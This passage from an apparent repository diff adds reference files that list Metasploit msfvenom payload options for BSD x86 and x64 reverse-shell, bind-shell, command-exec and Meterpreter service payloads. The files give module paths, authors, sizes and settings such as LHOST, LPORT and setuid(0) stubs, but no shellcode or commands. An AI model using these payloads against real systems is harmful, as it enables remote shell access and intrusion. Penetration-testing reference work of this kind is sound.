CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x64-shell_bind_tcp.txt
+40
View File
@@ -0,0 +1,40 @@
Name: BSD x64 Shell Bind TCP
Module: payload/bsd/x64/shell_bind_tcp
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 136
Rank: Normal
Provided by:
nemo <nemo@felinemenace.org>
joev <joev@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Bind an arbitrary command to an arbitrary port
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x64-shell_bind_tcp_small.txt
+38
View File
@@ -0,0 +1,38 @@
Name: BSD x64 Command Shell, Bind TCP Inline
Module: payload/bsd/x64/shell_bind_tcp_small
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 88
Rank: Normal
Provided by:
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x64-shell_reverse_ipv6_tcp.txt
+46
View File
@@ -0,0 +1,46 @@
Name: BSD x64 Command Shell, Reverse TCP Inline (IPv6)
Module: payload/bsd/x64/shell_reverse_ipv6_tcp
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 105
Rank: Normal
Provided by:
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SCOPEID 0 no IPv6 scope ID, for link-local addresses
Description:
Connect back to attacker and spawn a command shell over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x64-shell_reverse_tcp.txt
+47
View File
@@ -0,0 +1,47 @@
Name: BSD x64 Shell Reverse TCP
Module: payload/bsd/x64/shell_reverse_tcp
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 98
Rank: Normal
Provided by:
nemo <nemo@felinemenace.org>
joev <joev@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD /bin/sh yes The command string to execute
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x64-shell_reverse_tcp_small.txt
+45
View File
@@ -0,0 +1,45 @@
Name: BSD x64 Command Shell, Reverse TCP Inline
Module: payload/bsd/x64/shell_reverse_tcp_small
Platform: BSD
Arch: x64
Needs Admin: No
Total size: 81
Rank: Normal
Provided by:
Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-exec.txt
+35
View File
@@ -0,0 +1,35 @@
Name: BSD Execute Command
Module: payload/bsd/x86/exec
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 16
Rank: Normal
Provided by:
snagg <snagg@openssl.it>
argp <argp@census-labs.com>
joev <joev@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CMD yes The command string to execute
Description:
Execute an arbitrary command
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-metsvc_bind_tcp.txt
+49
View File
@@ -0,0 +1,49 @@
Name: FreeBSD Meterpreter Service, Bind TCP
Module: payload/bsd/x86/metsvc_bind_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Stub payload for interacting with a Meterpreter Service
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-metsvc_reverse_tcp.txt
+56
View File
@@ -0,0 +1,56 @@
Name: FreeBSD Meterpreter Service, Reverse TCP Inline
Module: payload/bsd/x86/metsvc_reverse_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 0
Rank: Normal
Provided by:
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Stub payload for interacting with a Meterpreter Service
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
MeterpreterDebugBuild false no Use a debug version of Meterpreter
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell-bind_ipv6_tcp.txt
+45
View File
@@ -0,0 +1,45 @@
Name: BSD Command Shell, Bind TCP Stager (IPv6)
Module: payload/bsd/x86/shell/bind_ipv6_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 63
Rank: Normal
Provided by:
skape <mmiller@hick.org>
vlad902 <vlad902@gmail.com>
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Spawn a command shell (staged).
Listen for a connection over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell-bind_tcp.txt
+43
View File
@@ -0,0 +1,43 @@
Name: BSD Command Shell, Bind TCP Stager
Module: payload/bsd/x86/shell/bind_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 54
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Spawn a command shell (staged).
Listen for a connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell-find_tag.txt
+38
View File
@@ -0,0 +1,38 @@
Name: BSD Command Shell, Find Tag Stager
Module: payload/bsd/x86/shell/find_tag
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 40
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Description:
Spawn a command shell (staged).
Use an established connection
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
TAG qFGA yes The four byte tag to signify the connection.
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell-reverse_ipv6_tcp.txt
+53
View File
@@ -0,0 +1,53 @@
Name: BSD Command Shell, Reverse TCP Stager (IPv6)
Module: payload/bsd/x86/shell/reverse_ipv6_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 81
Rank: Normal
Provided by:
skape <mmiller@hick.org>
vlad902 <vlad902@gmail.com>
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SCOPEID 0 no IPv6 scope ID, for link-local addresses
Description:
Spawn a command shell (staged).
Connect back to the attacker over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell-reverse_tcp.txt
+50
View File
@@ -0,0 +1,50 @@
Name: BSD Command Shell, Reverse TCP Stager
Module: payload/bsd/x86/shell/reverse_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 43
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Spawn a command shell (staged).
Connect back to the attacker
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
EnableStageEncoding false no Encode the second stage payload
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell_bind_tcp.txt
+38
View File
@@ -0,0 +1,38 @@
Name: BSD Command Shell, Bind TCP Inline
Module: payload/bsd/x86/shell_bind_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 73
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell_bind_tcp_ipv6.txt
+40
View File
@@ -0,0 +1,40 @@
Name: BSD Command Shell, Bind TCP Inline (IPv6)
Module: payload/bsd/x86/shell_bind_tcp_ipv6
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 87
Rank: Normal
Provided by:
skape <mmiller@hick.org>
vlad902 <vlad902@gmail.com>
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST no The target address
Description:
Listen for a connection and spawn a command shell over IPv6
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell_find_port.txt
+37
View File
@@ -0,0 +1,37 @@
Name: BSD Command Shell, Find Port Inline
Module: payload/bsd/x86/shell_find_port
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 60
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CPORT 35777 no The local client port
Description:
Spawn a shell on an established connection
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell_find_tag.txt
+33
View File
@@ -0,0 +1,33 @@
Name: BSD Command Shell, Find Tag Inline
Module: payload/bsd/x86/shell_find_tag
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 70
Rank: Normal
Provided by:
skape <mmiller@hick.org>
Description:
Spawn a shell on an established connection (proxy/NAT safe)
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
TAG T2v6 yes The four byte tag to signify the connection.
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell_reverse_tcp.txt
+45
View File
@@ -0,0 +1,45 @@
Name: BSD Command Shell, Reverse TCP Inline
Module: payload/bsd/x86/shell_reverse_tcp
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 64
Rank: Normal
Provided by:
Ramon de C Valle <rcvalle@metasploit.com>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Description:
Connect back to attacker and spawn a command shell
Name Current Setting Required Description
---- --------------- -------- -----------
AppendExit false no Append a stub that executes the exit(0) system call
AutoRunScript no A script to run automatically on session creation.
AutoVerifySession true yes Automatically verify and drop invalid sessions
CommandShellCleanupCommand no A command to run before the session is closed
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PrependSetgid false no Prepend a stub that executes the setgid(0) system call
PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call
PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call
PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call
PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call
PrependSetuid false no Prepend a stub that executes the setuid(0) system call
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
msfvenom/payload_options/bsd-x86-shell_reverse_tcp_ipv6.txt
+48
View File
@@ -0,0 +1,48 @@
Name: BSD Command Shell, Reverse TCP Inline (IPv6)
Module: payload/bsd/x86/shell_reverse_tcp_ipv6
Platform: BSD
Arch: x86
Needs Admin: No
Total size: 96
Rank: Normal
Provided by:
skape <mmiller@hick.org>
vlad902 <vlad902@gmail.com>
hdm <x@hdm.io>
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
